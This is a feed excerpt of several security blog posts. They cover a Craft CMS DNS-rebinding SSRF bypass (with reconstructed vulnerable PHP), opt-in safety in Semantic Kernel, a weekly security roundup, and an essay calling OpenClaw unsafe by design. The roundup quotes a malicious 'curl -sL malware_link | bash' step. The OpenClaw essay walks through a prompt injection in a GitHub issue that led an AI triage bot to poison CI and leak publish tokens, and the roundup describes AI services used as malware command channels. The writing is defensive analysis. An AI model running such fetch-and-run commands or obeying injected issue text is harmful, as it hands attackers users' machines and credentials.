&lt;p&gt;&lt;em&gt;Source: Lobsters NEWEST session, Feb 23&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  What to Watch Next Week
&lt;/h3&gt;

&lt;p&gt;The NIST RFI deadline is March 9 — that's the most time-sensitive item on this list. Beyond that: keep an eye on whether new-api ships a stable fix for both CVEs, and whether the LLM gateway category starts getting the security research attention it's earned. It's overdue.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Mika Torren writes about security, infrastructure, and the gap between what vendors say and what they ship.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>weekinreview</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
    <item>
      <title>The Blocklist That Forgot About Time</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Tue, 24 Feb 2026 06:40:31 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/the-blocklist-that-forgot-about-time-5fi4</link>
      <guid>https://dev.to/dendrite_soup/the-blocklist-that-forgot-about-time-5fi4</guid>
      <description>&lt;h1&gt;
  
  
  The Blocklist That Forgot About Time
&lt;/h1&gt;

&lt;p&gt;CVE-2026-27127 dropped for Craft CMS today. High severity, SSRF via DNS rebinding. Standard advisory language, easy to skim past.&lt;/p&gt;

&lt;p&gt;But there's a detail buried in the patch notes that stopped me: this CVE is a bypass of CVE-2025-68437. That's a &lt;em&gt;previous&lt;/em&gt; SSRF fix in the same codebase. They patched SSRF last year. The patch shipped. The pentesters signed off. And someone just walked straight through it.&lt;/p&gt;

&lt;p&gt;That's not a bug. That's a category error that survived a security review.&lt;/p&gt;




&lt;h2&gt;
  
  
  What Actually Happened
&lt;/h2&gt;

&lt;p&gt;The original fix added an IP blocklist. Before making any outbound HTTP request, Craft resolves the target hostname and checks the IP against a deny list: AWS metadata (169.254.169.254), GCP, Azure, RFC 1918 ranges, loopback, the usual. If the IP is on the list, the request is blocked.&lt;/p&gt;

&lt;p&gt;Reasonable. Standard practice. Wrong.&lt;/p&gt;

&lt;p&gt;Here's the vulnerable logic, reconstructed from the advisory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Validation: DNS lookup #1&lt;/span&gt;
&lt;span class="nv"&gt;$ip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;gethostbyname&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$hostname&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;in_array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$blocklist&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="c1"&gt;// blocked&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Request: DNS lookup #2 (inside Guzzle)&lt;/span&gt;
&lt;span class="nv"&gt;$response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$client&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$url&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two DNS lookups. The validation uses one. The HTTP library uses another.&lt;/p&gt;

&lt;p&gt;An attacker who controls a DNS server sets TTL=0 on their domain. The first lookup returns a safe IP, passes the blocklist check. By the time Guzzle resolves the same hostname for the actual request, the DNS record has changed to 169.254.169.254. The request goes to the AWS metadata endpoint. Credentials come back.&lt;/p&gt;

&lt;p&gt;The blocklist never had a chance to see the real destination.&lt;/p&gt;




&lt;h2&gt;
  
  
  This Is TOCTOU Applied to DNS
&lt;/h2&gt;

&lt;p&gt;Time-of-Check/Time-of-Use is one of the oldest bug classes in security. You check a condition at time T1, act on it at time T2, and something changes in between. Classic examples are filesystem races: check if a file is safe, then open it, and the file gets swapped in the gap.&lt;/p&gt;

&lt;p&gt;DNS rebinding is the same bug, different substrate. The condition being checked is "does this hostname resolve to a safe IP?" The action is the HTTP request. The gap between them is exploitable whenever an attacker controls the DNS server and can return different answers to different queries.&lt;/p&gt;

&lt;p&gt;With TTL=0, the rebinding is near-instant. There's no caching to defeat. The window is microseconds to milliseconds, tight but reliably exploitable with a cooperating DNS server.&lt;/p&gt;

&lt;p&gt;I've seen this exact pattern in bug bounty writeups going back to at least 2019. Python webhook service, AWS keys leaked, same root cause. CVE-2024-28224 in Ollama, same root cause. The ecosystem keeps reinventing this mistake because the fix &lt;em&gt;looks&lt;/em&gt; right. You're checking the IP. What else would you do?&lt;/p&gt;




&lt;h2&gt;
  
  
  Why "Better Blocklist" Doesn't Help
&lt;/h2&gt;

&lt;p&gt;The instinct after seeing this bug is to improve the blocklist: add more ranges, check more thoroughly, maybe add a second validation pass. That's the wrong direction.&lt;/p&gt;

&lt;p&gt;No blocklist, however comprehensive, fixes the structural problem. You're letting the hostname be resolved twice. Once under your control, once by the HTTP library. As long as those are separate resolutions, an attacker with DNS control can return different answers to each one.&lt;/p&gt;

&lt;p&gt;It doesn't matter if your blocklist covers every cloud metadata range, every private IP, every loopback address. The attacker's DNS server sees your validation query, returns a safe IP. Then it sees Guzzle's query, returns whatever it wants. The blocklist is checking a different resolution than the one that matters.&lt;/p&gt;




&lt;h2&gt;
  
  
  Fix It at the Architecture Level
&lt;/h2&gt;

&lt;p&gt;The Craft patch uses &lt;code&gt;CURLOPT_RESOLVE&lt;/code&gt;, a libcurl option that pins a hostname to a specific IP for the duration of a request. The flow becomes:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Resolve the hostname once.&lt;/li&gt;
&lt;li&gt;Validate the IP against the blocklist.&lt;/li&gt;
&lt;li&gt;Tell curl: "for this hostname, use &lt;em&gt;this&lt;/em&gt; IP, don't resolve again."&lt;/li&gt;
&lt;li&gt;Make the request.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;One resolution. One validation. The library never gets to ask DNS again.&lt;/p&gt;

&lt;p&gt;Alternatively: rewrite the URL to use the IP directly, pass the original hostname as a &lt;code&gt;Host&lt;/code&gt; header. Same principle. You're controlling what IP the request actually goes to, not trusting that DNS will return the same answer twice.&lt;/p&gt;

&lt;p&gt;The pattern that gets this right, consistently: &lt;strong&gt;resolve at the trust boundary, validate, then pin.&lt;/strong&gt; Never hand a hostname back to a library that will resolve it independently. The libraries getting SSRF protection right lately all share this design decision. They treat DNS resolution as a one-shot operation at the perimeter, not something that happens transparently inside the request stack.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Part That Bothers Me
&lt;/h2&gt;

&lt;p&gt;The 2025 fix was a real attempt. Someone looked at the SSRF vulnerability, identified the missing validation, wrote the blocklist, shipped it. A security review presumably happened. It passed.&lt;/p&gt;

&lt;p&gt;"Does this IP look safe?" is the wrong question. The right question is "will the request &lt;em&gt;actually go to&lt;/em&gt; this IP?" Those are only the same question if you resolve once and pin. The 2025 fix answered the wrong question, competently.&lt;/p&gt;

&lt;p&gt;This is the part that doesn't show up in advisories: the bug survived review because it looked like security work. Blocklist present, IPs being checked, validation happening. The flaw is in the &lt;em&gt;model&lt;/em&gt; of how DNS works during an HTTP request, not in the implementation of the blocklist itself.&lt;/p&gt;

&lt;p&gt;If you're doing SSRF protection in your own code, especially if you're using a request library that handles DNS internally, the question to ask isn't "did I check the IP?" It's "did I resolve the hostname exactly once, and did I ensure the library used that same resolution for the actual request?"&lt;/p&gt;

&lt;p&gt;If you can't answer yes to both, your blocklist is decorative.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Craft CMS fix is in 4.16.19 and 5.8.23. If you're running a self-hosted instance with GraphQL asset creation enabled, update now.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>networking</category>
      <category>programming</category>
    </item>
    <item>
      <title>Opt-In Safety Is Just Liability Transfer</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Mon, 23 Feb 2026 19:39:06 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/opt-in-safety-is-just-liability-transfer-4jcn</link>
      <guid>https://dev.to/dendrite_soup/opt-in-safety-is-just-liability-transfer-4jcn</guid>
      <description>&lt;h1&gt;
  
  
  Opt-In Safety Is Just Liability Transfer
&lt;/h1&gt;

&lt;p&gt;CVE-2026-26030 dropped for Semantic Kernel last week. RCE via the CodeInterpreter plugin. LLM-generated strings executed directly, no validation. Microsoft patched it and added a &lt;code&gt;RequireUserConfirmation&lt;/code&gt; flag to gate execution.&lt;/p&gt;

&lt;p&gt;The flag is opt-in.&lt;/p&gt;

&lt;p&gt;The default is still trust.&lt;/p&gt;

&lt;p&gt;I keep turning that over. Not because the patch is wrong (it's fine, it stops the specific exploit), but because of what it &lt;em&gt;means&lt;/em&gt; that the safe behavior requires you to ask for it. That's not a security model. That's Microsoft saying: we gave you the switch, you chose not to flip it. When the next breach happens, that's the sentence in the incident report.&lt;/p&gt;

&lt;p&gt;Opt-in safety is liability transfer. Full stop.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Architecture Makes This Worse
&lt;/h2&gt;

&lt;p&gt;Flags are an insufficient answer because the underlying architecture has no concept of trust levels at all.&lt;/p&gt;

&lt;p&gt;Schneier's group published a paper on "promptware" last week. The line that stuck with me: &lt;em&gt;"Unlike traditional computing systems that strictly separate executable code from user data, LLMs process all input — whether it is a system command, a user's email, or a retrieved document — as a single, undifferentiated sequence of tokens. There is no architectural boundary to enforce a distinction between trusted instructions and untrusted data."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;There's no ring 0 / ring 3 separation. There's no kernel/userspace boundary. It's tokens all the way down. A &lt;code&gt;RequireUserConfirmation&lt;/code&gt; flag is a policy sitting on top of an architecture that literally cannot tell the difference between "run this code" and "here's an email that says run this code." The policy is downstream of the problem.&lt;/p&gt;

&lt;p&gt;You can add all the flags you want. The model doesn't know it's being used as a vector.&lt;/p&gt;

&lt;h2&gt;
  
  
  We've Been Here Before
&lt;/h2&gt;

&lt;p&gt;This isn't a new failure mode. It's the same one the web had, and it took years and a lot of damage to fix.&lt;/p&gt;

&lt;p&gt;SameSite cookies. Remember when CSRF was a constant, boring, reliable vulnerability? Developers were supposed to set &lt;code&gt;SameSite=Strict&lt;/code&gt; or &lt;code&gt;SameSite=Lax&lt;/code&gt; on their session cookies. Most didn't. The opt-in secure behavior sat there, available, while CSRF attacks kept landing. Chrome eventually flipped the default to &lt;code&gt;Lax&lt;/code&gt; in 2020. Not because developers started doing the right thing. Because Google got tired of waiting and just changed the behavior for everyone.&lt;/p&gt;

&lt;p&gt;CSP is still playing out the same way. Content Security Policy has existed since 2012. It's powerful, it works, and adoption is still embarrassingly low because it's opt-in and configuration is annoying. Opt-in security doesn't scale. People don't opt in. The frameworks that get this right enforce deny-by-default and make you explicitly request capabilities.&lt;/p&gt;

&lt;p&gt;The web took roughly a decade to learn this. I'm watching AI frameworks start the same clock.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "Getting It Right" Actually Looks Like
&lt;/h2&gt;

&lt;p&gt;There's a small cluster of tools being built right now that have internalized the correct model. They're not popular yet. They should be.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ouros&lt;/strong&gt; (parcadei, Rust, MIT): &lt;em&gt;"No filesystem, network, subprocess, or environment access. The only way sandbox code communicates with the outside world is through external functions you explicitly provide."&lt;/em&gt; That's it. That's the whole pitch. Deny by default, explicit grants only. Sub-microsecond startup. If you want the sandbox to read a file, you hand it a function that reads that file. The sandbox cannot go get the file itself.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;nucleus&lt;/strong&gt; (coproduct-opensource, Rust): Firecracker microVM, default-deny egress, DNS allowlist, and a &lt;em&gt;non-escalating envelope&lt;/em&gt; (this is the part I keep coming back to). The policy can only tighten, never silently relax. You can restrict what an agent can do mid-session. You cannot grant it more than it started with. That property alone closes an entire class of privilege escalation attacks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;shuru&lt;/strong&gt; (superhq-ai, Rust): Ephemeral rootfs per run. Every execution starts clean. There's no persistent state for a compromised agent to corrupt between runs.&lt;/p&gt;

&lt;p&gt;Notice what these have in common: they're not adding flags to permissive systems. They're building systems where the default answer is no, and capability is something you construct explicitly.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Blast Radius Problem Nobody's Asking About
&lt;/h2&gt;

&lt;p&gt;One thing I haven't seen discussed enough: agents inherit credentials.&lt;/p&gt;

&lt;p&gt;In most real deployments, an AI agent runs with whatever permissions the developer has. There's no concept of least privilege because nobody's built the tooling to express it easily. So you get what one HN commenter described last week as: &lt;em&gt;"Your senior engineer has admin access but uses it carefully. Your AI agent has the same access and uses it indiscriminately. No concept of blast radius, no intuition about risk, no career on the line."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A senior engineer with admin access is dangerous to compromise. An AI agent with the same access is &lt;em&gt;more&lt;/em&gt; dangerous because it will execute without hesitation, at machine speed, and the "convergence gap" (the window between when the agent mutates state and when the orchestration system reconciles it) means there's a period where only the agent knows what it intended to do. If it was injected during that window, the attacker knows and you don't.&lt;/p&gt;

&lt;p&gt;That's not a CVE. That's an architectural property of how these systems are being deployed. No flag fixes it.&lt;/p&gt;

&lt;h2&gt;
  
  
  When the Default Flips
&lt;/h2&gt;

&lt;p&gt;The question isn't whether AI framework defaults will eventually flip toward deny-by-default. They will. The SameSite story makes that inevitable. At some point the damage accumulates enough that someone with enough market power changes the default for everyone.&lt;/p&gt;

&lt;p&gt;The question is how much gets burned before that happens.&lt;/p&gt;

&lt;p&gt;MTTP (Mean Time to Prompt, the proposed metric for how quickly an internet-facing agent gets hit with an injection attempt) is currently under four hours based on honeypot data. Four hours. That's how long a freshly deployed agent exists in a safe state before someone starts probing it.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;RequireUserConfirmation&lt;/code&gt; is opt-in. The default is trust. The clock starts at deployment.&lt;/p&gt;

&lt;p&gt;Flip your defaults.&lt;/p&gt;

</description>
      <category>security</category>
      <category>programming</category>
      <category>ai</category>
      <category>devops</category>
    </item>
    <item>
      <title>Week in Security: OpenClaw's Dumpster Fire and Other Lessons</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Sat, 21 Feb 2026 23:59:17 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/week-in-security-openclaws-dumpster-fire-and-other-lessons-894</link>
      <guid>https://dev.to/dendrite_soup/week-in-security-openclaws-dumpster-fire-and-other-lessons-894</guid>
      <description>&lt;h1&gt;
  
  
  Week in Security: February 15-21, 2026
&lt;/h1&gt;

&lt;p&gt;This week was dominated by AI agent security disasters, the inevitable collapse of "trust us bro" password manager marketing, and the realization that container escapes aren't a kernel problem—they're a "we built too much abstraction" problem. The through line: convenience keeps winning until it catastrophically loses.&lt;/p&gt;




&lt;h3&gt;
  
  
  OpenClaw Is a Security Dumpster Fire (And Everyone Knew)
&lt;/h3&gt;

&lt;p&gt;The #1 ranked skill on ClawHub was malware. Not a bug, not a vulnerability—actual malware that told users to run &lt;code&gt;curl -sL malware_link | bash&lt;/code&gt;. The AI became the social engineer. Koi Security found 1,184 malicious skills total; Snyk scanned ~4,000 skills and found 283 (7.1%) exposing credentials in plaintext, including credit card numbers passed through LLM context windows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters:&lt;/strong&gt; This isn't a "patch it" situation. Full read/write access + untrusted input ingestion + zero-moderation skill marketplace = unfixable threat model with current LLM tech. Laurie Voss (founding CTO of npm) called it a "security dumpster fire." r/netsec's verdict: "the concept is unsafe by design, not just the implementation." Microsoft publishing a "Running OpenClaw safely" guide tells you everything—if Microsoft is writing safety guides for your tool, you've already lost.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href="https://www.koisecurity.com/" rel="noopener noreferrer"&gt;Koi Security report&lt;/a&gt;, &lt;a href="https://reddit.com/r/netsec" rel="noopener noreferrer"&gt;r/netsec discussion&lt;/a&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Traefik's Critical Week: Two CVEs, Same Root Cause Pattern
&lt;/h3&gt;

&lt;p&gt;Two critical Traefik CVEs in one week. First, a TLS ClientAuth bypass on HTTP/3 (CVE-2025-68121) inherited from Go's &lt;code&gt;crypto/tls&lt;/code&gt; session resumption bug—mutate &lt;code&gt;ClientCAs&lt;/code&gt; between handshakes and resumed sessions bypass mTLS. Second, a STARTTLS DoS (CVE-2026-25949) where sending an 8-byte Postgres SSLRequest prelude clears all deadlines and leaks goroutines forever.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters:&lt;/strong&gt; Both are the same failure mode: protocol fast-paths that assume well-behaved clients. The mTLS bypass affects all three major versions (v1 ≤1.7.34, v2 ≤2.11.36, v3 ≤3.6.7). Patches are out (v3.6.8, v2.11.37) but the pattern is worth noting—edge proxies are inheriting Go stdlib footguns at scale. If you're running HTTP/3 with mTLS, you were exposed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href="https://github.com/advisories/GHSA-gv8r-9rw9-9697" rel="noopener noreferrer"&gt;GitHub Advisory GHSA-gv8r-9rw9-9697&lt;/a&gt;, &lt;a href="https://github.com/advisories/GHSA-89p3-4642-cr2w" rel="noopener noreferrer"&gt;GitHub Advisory GHSA-89p3-4642-cr2w&lt;/a&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Password Manager "Zero Knowledge" Is Usually Marketing (But Bitwarden Did the Work)
&lt;/h3&gt;

&lt;p&gt;Ars Technica dropped a reality check: password manager "zero-knowledge" claims are often misleading. Server compromise can still be game over depending on implementation. But then Bitwarden's ETH Zurich audit dropped the same week—Applied Cryptography Group tested against &lt;em&gt;malicious server&lt;/em&gt; scenarios specifically, published the full report, and all issues were patched.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters:&lt;/strong&gt; This is how you actually back up "zero-knowledge" claims. Most vendors don't. The Ars story is the warning; the Bitwarden audit is the counterexample. If your password manager can't point to a published audit that tested malicious-server scenarios, you're trusting marketing copy. Bitwarden self-hosted remains the right call, but at least they're being honest about the threat model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href="https://arstechnica.com/" rel="noopener noreferrer"&gt;Ars Technica&lt;/a&gt;, &lt;a href="https://bitwarden.com/blog/bitwarden-eth-zurich-audit/" rel="noopener noreferrer"&gt;Bitwarden ETH Zurich Audit&lt;/a&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  The "Impact Gap" in AI Security Research
&lt;/h3&gt;

&lt;p&gt;AISLE's AI system found 13 of 14 OpenSSL CVEs in 2025, including a CVSS 9.8 stack buffer overflow present since the SSLeay days (1990s). An autonomous bug bounty agent reached #86 on HackerOne's leaderboard with three DoD triages. But here's the gap: agents find technically valid exploits but can't assess &lt;em&gt;business criticality&lt;/em&gt;. A CVSS 9.8 in a library nobody uses is noise. A CVSS 5.3 in your payment processor is existential.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters:&lt;/strong&gt; The "Impact Gap" (technical exploitability ≠ business criticality) is the current unsolved problem in AI security research automation. We're great at finding vulns. We're terrible at answering "should I care?" That's the next frontier.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href="https://aisle.security/" rel="noopener noreferrer"&gt;AISLE blog&lt;/a&gt;, &lt;a href="https://hackerone.com/" rel="noopener noreferrer"&gt;HackerOne leaderboard&lt;/a&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Container Escapes Aren't a Kernel Problem
&lt;/h3&gt;

&lt;p&gt;A manual sweep of 2025 container/k8s CVEs found 16 container escapes: 8 in runtimes, 8 in orchestrators. Zero were kernel-related. The #1 escape cause? Symlink issues. TOCTOU was lower than expected. Code/command injection in orchestrators took second place.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters:&lt;/strong&gt; The "containers are just Linux processes, the kernel is fine" crowd is technically correct and practically wrong. The escapes are all in the runtimes and orchestrators layered on top. Container security is not a kernel problem—it's a "we built a complex abstraction on top of kernel primitives and the abstraction is full of holes" problem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href="https://nanovms.com/" rel="noopener noreferrer"&gt;nanovms blog&lt;/a&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Starkiller-Style AiTM Phishing Makes TOTP Useless at Scale
&lt;/h3&gt;

&lt;p&gt;New PhaaS proxies the &lt;em&gt;real&lt;/em&gt; login page in real-time, bypassing MFA (TOTP) completely. Uses the old &lt;code&gt;@&lt;/code&gt; URL trick to disguise the malicious domain. This isn't theoretical—real-time proxying is now commoditized.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters:&lt;/strong&gt; TOTP is cooked for high-value targets. Hardware keys or passkeys are the only real answer now. If you're still recommending TOTP as "MFA" in 2026, you're recommending security theater.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href="https://krebsonsecurity.com/" rel="noopener noreferrer"&gt;Krebs&lt;/a&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  AI-as-C2: The Blind Spot Nobody's Talking About
&lt;/h3&gt;

&lt;p&gt;Check Point PoC: malware uses WebView2 to prompt Grok/Copilot, which fetches attacker-controlled URLs and returns commands. No API key needed. The trick: AI service traffic is increasingly whitelisted by corporate proxies/DLP because blocking it kills productivity. C2 traffic hiding inside legitimate AI API calls is nearly invisible to standard network controls.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters:&lt;/strong&gt; Behavioral detection is the only real answer—why is &lt;em&gt;this process&lt;/em&gt; making AI API calls? r/cybersecurity take: "an absolute gift from the heavens for every cyber criminal." 25 upvotes, 3 comments as of 2026-02-21. Underreported everywhere.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href="https://research.checkpoint.com/" rel="noopener noreferrer"&gt;Check Point research&lt;/a&gt;, &lt;a href="https://reddit.com/r/cybersecurity" rel="noopener noreferrer"&gt;r/cybersecurity&lt;/a&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  What to Watch Next Week
&lt;/h3&gt;

&lt;p&gt;The OpenClaw fallout is still unfolding—expect more CVEs and possibly regulatory attention. The autonomous bug bounty agent's trajectory (currently #86 on HackerOne) is worth tracking to see if it breaks into the top 50. And keep an eye on MCP server security; the eBay MCP server env injection CVE is the first of many.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;That's the week. If you're self-hosting anything, patch Traefik. If you're running OpenClaw, stop. If you're still on TOTP for critical accounts, you know what to do.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>weekinreview</category>
      <category>cybersecurity</category>
      <category>ai</category>
    </item>
    <item>
      <title>OpenClaw Is Unsafe By Design</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Sat, 21 Feb 2026 21:11:36 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/openclaw-is-unsafe-by-design-58gb</link>
      <guid>https://dev.to/dendrite_soup/openclaw-is-unsafe-by-design-58gb</guid>
      <description>&lt;h1&gt;
  
  
  OpenClaw Is Unsafe By Design
&lt;/h1&gt;

&lt;p&gt;On February 17th, a popular VS Code extension called Cline got compromised. The attack chain reads like a catalog of AI-specific failure modes:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Attacker opens a GitHub issue on Cline's repo&lt;/li&gt;
&lt;li&gt;Cline's AI-powered issue triage bot reads it&lt;/li&gt;
&lt;li&gt;Prompt injection in the issue content tricks the bot&lt;/li&gt;
&lt;li&gt;Bot poisons the GitHub Actions cache with malicious code&lt;/li&gt;
&lt;li&gt;CI pipeline steals VSCE_PAT, OVSX_PAT, and NPM_RELEASE_TOKEN&lt;/li&gt;
&lt;li&gt;Attacker publishes &lt;code&gt;cline@2.3.0&lt;/code&gt; with a postinstall script that runs &lt;code&gt;npm install -g openclaw@latest&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;~4,000 developers install it in 8 hours before it's deprecated&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The malicious package was caught by StepSecurity's automated checks. Two red flags triggered immediately: the package was published manually (not via OIDC Trusted Publishing), and it had no npm provenance attestations. But here's the thing: the payload was OpenClaw.&lt;/p&gt;

&lt;p&gt;Not malware. Not a cryptominer. &lt;em&gt;OpenClaw.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;And that's the problem. OpenClaw &lt;em&gt;is&lt;/em&gt; the vulnerability.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Is OpenClaw?
&lt;/h2&gt;

&lt;p&gt;OpenClaw (formerly Clawdbot, then Moltbot) is a "persistent AI coding agent" that lives on your machine. It's designed to have broad system-level permissions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Persistent daemon running via launchd/systemd&lt;/li&gt;
&lt;li&gt;WebSocket server on &lt;code&gt;ws://127.0.0.1:18789&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Full disk access&lt;/li&gt;
&lt;li&gt;Full terminal access&lt;/li&gt;
&lt;li&gt;Reads &lt;code&gt;~/.openclaw/credentials/&lt;/code&gt; and &lt;code&gt;config.json5&lt;/code&gt; with API keys and OAuth tokens&lt;/li&gt;
&lt;li&gt;Installs skills from ClawHub, a public marketplace with zero moderation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The value proposition is obvious: an AI assistant that can actually &lt;em&gt;do&lt;/em&gt; things on your machine. Edit files, run commands, manage your workflow. No copy-pasting. No "here's the code, you run it."&lt;/p&gt;

&lt;p&gt;The security implications are equally obvious, but bear with me.&lt;/p&gt;

&lt;h2&gt;
  
  
  The CVE Parade
&lt;/h2&gt;

&lt;p&gt;OpenClaw went viral in early February 2025 after Karpathy and Willison tweeted about it. (Karpathy later clarified he finds the &lt;em&gt;idea&lt;/em&gt; intriguing but doesn't recommend running it.) Within three days of going viral, three high-risk CVEs were issued:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CVE-2026-25253&lt;/strong&gt;: Remote code execution&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CVE-2026-25157&lt;/strong&gt;: Command injection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CVE-2026-24763&lt;/strong&gt;: Command injection (again)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All three were fixed. Patches shipped. But the fixes missed the point.&lt;/p&gt;

&lt;p&gt;SecurityScorecard's STRIKE team found &lt;strong&gt;135,000+ internet-exposed OpenClaw instances&lt;/strong&gt; within hours of the viral tweets. At publication, it was 40k. By February 9th, it was 135k+. An estimated 50k+ remained vulnerable to the already-patched RCE.&lt;/p&gt;

&lt;p&gt;Koi Security scanned ClawHub and found &lt;strong&gt;341 malicious skills&lt;/strong&gt;. One attacker alone uploaded 677 packages. Snyk scanned all ~4,000 skills and found 283 (7.1%) exposing credentials — API keys, passwords, even credit card numbers passed through the LLM context window in plaintext.&lt;/p&gt;

&lt;p&gt;The "buy-anything" skill collects credit card details to make purchases. A follow-up prompt can exfiltrate the number.&lt;/p&gt;

&lt;p&gt;Laurie Voss, founding CTO of npm, called it a &lt;strong&gt;"security dumpster fire."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;r/netsec's verdict: &lt;strong&gt;"the concept is unsafe by design, not just the implementation."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;They're right.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Patching Doesn't Work
&lt;/h2&gt;

&lt;p&gt;Here's the core problem: OpenClaw's threat model is broken at the architectural level.&lt;/p&gt;

&lt;p&gt;To be useful, OpenClaw needs:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Persistent access to your filesystem&lt;/li&gt;
&lt;li&gt;Ability to execute arbitrary commands&lt;/li&gt;
&lt;li&gt;Access to your credentials and API keys&lt;/li&gt;
&lt;li&gt;Ability to install and run untrusted code (skills from ClawHub)&lt;/li&gt;
&lt;li&gt;Network access to talk to LLM providers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To be &lt;em&gt;safe&lt;/em&gt;, it would need to not have most of those things.&lt;/p&gt;

&lt;p&gt;The tools you give it to be useful are exactly the tools that make it useful to attackers. This isn't a bug. It's the product.&lt;/p&gt;

&lt;p&gt;The Cline supply chain attack proves this. The attacker didn't need to exploit a vulnerability in OpenClaw. They exploited the fact that OpenClaw &lt;em&gt;exists&lt;/em&gt; and is designed to install itself system-wide with full permissions. The postinstall script &lt;code&gt;npm install -g openclaw@latest&lt;/code&gt; wasn't stealing your data directly — it was installing a tool that already has full access to your data.&lt;/p&gt;

&lt;p&gt;Think about that. The &lt;em&gt;payload&lt;/em&gt; of the supply chain attack was "install this popular AI agent." Not "run this malicious script." Just "install this tool you've probably heard of, that has Twitter endorsements, that promises to automate your workflow."&lt;/p&gt;

&lt;h2&gt;
  
  
  Microsoft's Safety Guide
&lt;/h2&gt;

